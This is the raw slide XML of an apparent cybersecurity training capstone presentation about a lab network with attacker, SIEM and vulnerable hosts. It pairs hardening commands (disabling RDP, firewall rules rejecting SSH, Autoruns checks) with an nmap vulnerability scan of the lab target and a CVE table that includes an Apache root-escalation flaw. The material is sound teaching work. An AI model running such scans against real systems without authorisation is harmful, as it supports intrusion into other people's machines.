              <a:rPr lang="en"/>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>eg add “HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server” /f /v fDenyTSConnections \t REG_DWORD /d 1</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>^ disable RDP connections / common file extensions that are not needed for system use (.exe, .ps1)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <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96" name="Google Shape;1296;p8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file uploads?</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>A file scanner should be implemented on the web server to quickly scan for known virus signatures</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Again a UTM system could be of use to log and monitor for abnormal behaviour </a:t>
            </a:r>
            <a:endParaRPr/>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04800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Unusual file types/sizes should immediately set an alarm</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Files that include key code to enable foreign connections should immediately set off an alarm</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1297" name="Google Shape;1297;p8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file uploads?</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Content filtering software to ensure no malicious files are being uploaded</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Block certain file size uploads</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>Describe the solution. If possible, provide the required command line. </a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Disable command prompt, powershell, terminal, and any other software that can be used for “living off the land” techniques that uploaded malicious files could use</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Autorunsc.exe -accepteula -a -c -i -e -f -l -m -v </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>w</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>atch -n 300 -d ls -lR /&lt;WEB DIRECTORY&gt;</a:t>
            </a:r>
            <a:endParaRPr/>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Stopping SSH shell connections</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1303" name="Google Shape;1303;p8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malicious SSH connections?</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Use IDS to monitor port 22 and 2222 connections</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Block any connections to SSH from outside IPs that have not been whitelisted </a:t>
            </a:r>
            <a:endParaRPr/>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04800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>There should be no connections through SSH from IPs excluded from the whitelist, threshold 0</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1304" name="Google Shape;1304;p8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malicious SSH connections?</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>The best approach to take would be to close/block port 22 and 2222</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>Describe the solution. If possible, provide the required command line. </a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Remove the use of SSH</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Stop the reuse of credentials between web logins and SSH login</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>iptables -I INPUT -s &lt;HOST IP&gt; -p tcp --dport ssh -j REJECT</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>firewall-cmd --direct --add-rule ipv4 filter INPUT 1 -m tcp --source &lt;HOST IP&gt; -p tcp --dport 22 -j REJECT</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="45720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marR="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800"/>
              <a:t>[Insert Here]</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>draw.io</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> to create</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> a diagram of the network.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Add your diagram to this slide and fill out the data in the sidebar.</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058" name="Google Shape;1058;p57"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7056300" y="910475"/>
            <a:ext cx="1814100" cy="40236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sz="900"/>
              <a:t>Address </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>Range: 192.168.1.1-254</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>Netmask: 255.255.255.255</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>Gateway: 192.168.1.1</a:t>
            </a:r>
            <a:endParaRPr sz="9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 (within Hypervisor network)</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>Pv4: 192.168.1.1</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>OS: Windows Server </a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>Hostname: Hypervisor</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>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Clr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>IPv4: 192.168.1.90</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>OS: Linux</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>Hostname: Kali</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>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Clr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>IPv4: 192.168.1.100</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>OS: Linux</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>Hostname: ELK</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>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Clr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>IPv4: 192.168.1.105</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>OS: Linux</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>Hostname: Capstone</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>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pic>
        <p:nvPicPr>
          <p:cNvPr id="1060" name="Google Shape;1060;p57"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="190500" y="910475"/>
            <a:ext cx="6624476" cy="4023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7" name="Google Shape;1067;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8" name="Google Shape;1068;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4" name="Google Shape;1074;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5" name="Google Shape;1075;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6" name="Google Shape;1076;p59"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="419800" y="1198750"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{75D3006A-5C03-46F3-BC92-FD3BB4A177DF}</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600">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Hypervisor </a:t>
                      </a:r>
                      <a:endParaRPr sz="16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Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>192.168.1.1</a:t>
                      </a:r>
                      <a:endParaRPr sz="16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600">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>VM provider - manages virtual network between all hosts</a:t>
                      </a:r>
                      <a:endParaRPr sz="16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600">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Kali</a:t>
                      </a:r>
                      <a:endParaRPr sz="16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Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>192.168.1.90</a:t>
                      </a:r>
                      <a:endParaRPr sz="16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600">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Attacking OS - used to find vulnerabilities to exploit</a:t>
                      </a:r>
                      <a:endParaRPr sz="16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600">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>ELK</a:t>
                      </a:r>
                      <a:endParaRPr sz="16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Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>192.168.1.100</a:t>
                      </a:r>
                      <a:endParaRPr sz="16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SIEM tool - provides Kibana network logs</a:t>
                      </a:r>
                      <a:endParaRPr sz="16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600">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Capstone </a:t>
                      </a:r>
                      <a:endParaRPr sz="16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Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>192.168.1.105</a:t>
                      </a:r>
                      <a:endParaRPr sz="16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Vulnerable OS - used for exploiting vulnerabilities </a:t>
                      </a:r>
                      <a:endParaRPr sz="16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60"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="0"/>
            <a:ext cx="9168600" cy="6228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100"/>
              <a:t>Vulnerability </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2100"/>
              <a:t>Assessment →  nmap --script=vulners 192.168.1.105</a:t>
            </a:r>
            <a:endParaRPr sz="2100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1082" name="Google Shape;1082;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sz="900"/>
              <a:t>*Above list was ranked in order of most severe from top to bottom based on vulnerabilities discovered through initial </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>reconnaissance</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="1083" name="Google Shape;1083;p60"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="390750" y="689838"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{75D3006A-5C03-46F3-BC92-FD3BB4A177DF}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1375275"/>
                <a:gridCol w="4363250"/>
                <a:gridCol w="2623975"/>
              </a:tblGrid>
              <a:tr h="40497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901250">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="900">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>CVE-2019-0211</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Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>In Apache HTTP Server 2.4 releases 2.4.17 to 2.4.38, with MPM event, worker or prefork, code executing in less-privileged child processes or threads (including scripts executed by an in-process scripting interpreter) could execute arbitrary code with the privileges of the parent process (usually root) by manipulating the scoreboard. Non-Unix systems are not affected.</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900">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>If executed, can allow an attacker to </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="900">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>escalate</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="900">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t> privileges to become super user. If the attacker becomes root of the system then the whole system is compromised in its entirety. </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97200">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
